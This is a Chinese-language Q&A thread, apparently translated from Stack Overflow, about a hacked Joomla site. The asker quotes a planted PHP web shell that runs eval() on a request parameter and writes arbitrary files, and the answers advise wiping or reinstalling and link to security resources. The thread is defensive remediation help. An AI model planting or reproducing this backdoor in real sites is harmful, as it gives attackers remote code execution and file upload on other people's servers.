1

我有一个客户的 Joomla 网站被黑了,我不确定它是怎么发生的,但我可以看到有很多脚本在搜索包含单词eval 的文件时发送垃圾邮件(我发现 61 个匹配项,如下所示文件:

<?php

    $lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
    $mglvq = $_REQUEST['tlhqdsj'];
    eval($mglvq);
    exit();
}
if (isset($_REQUEST['ofva'])) {
    $ulmajcbk = $_REQUEST['tbun'];
    $cdpumv = $_REQUEST['ofva'];
    $tgcjl = fopen($cdpumv, 'w');
    $ogrmbcz = fwrite($tgcjl, $ulmajcbk);
    fclose($tgcjl);
    echo $ogrmbcz;
    exit();
}

?>

我不想删除整个网站,因为我没有开发它,我只需要一个安全检查表和一种搜索其他已知漏洞的方法。

我应该在安装此 Joomla 网站的服务器上采取哪些其他预防措施?

知道他们是如何将这么多文件上传到服务器的吗?

4

2 回答 2

2

这是一个僵尸网络 PHP 文件,很可能通过 Joomla 中的漏洞传播(例如,在 8 月中旬披露了一个)。它允许远程用户执行任意 PHP 代码并将文件上传到您的服务器。有关更多信息,请参阅Joomla 安全页面

我最强烈的建议是擦除整个服务器——或者至少是客户用户可以访问的任何东西——然后重新开始。你永远不知道攻击者上传了什么,你也永远无法完全确定没有更多的后门存在。

如果这不可行,我建议擦除 Joomla 安装并使用 Joomla 2.5.14 或 3.1.5 的新副本重新安装。

如果你连这个都做不到那么你可以尝试就地升级 Joomla,搜索受感染的 PHP 文件,然后删除它们。但是,您面临着丢失文件并仍然容易受到攻击的巨大风险。

于 2013-10-31T02:10:12.023 回答
2

在上面的答案中添加更多内容,我希望您在下面阅读。

安全清单/您已被黑客入侵或污损

Joomla 被黑了。如何预防?

Joomla 安全

易受攻击的扩展列表

于 2013-10-31T04:44:07.657 回答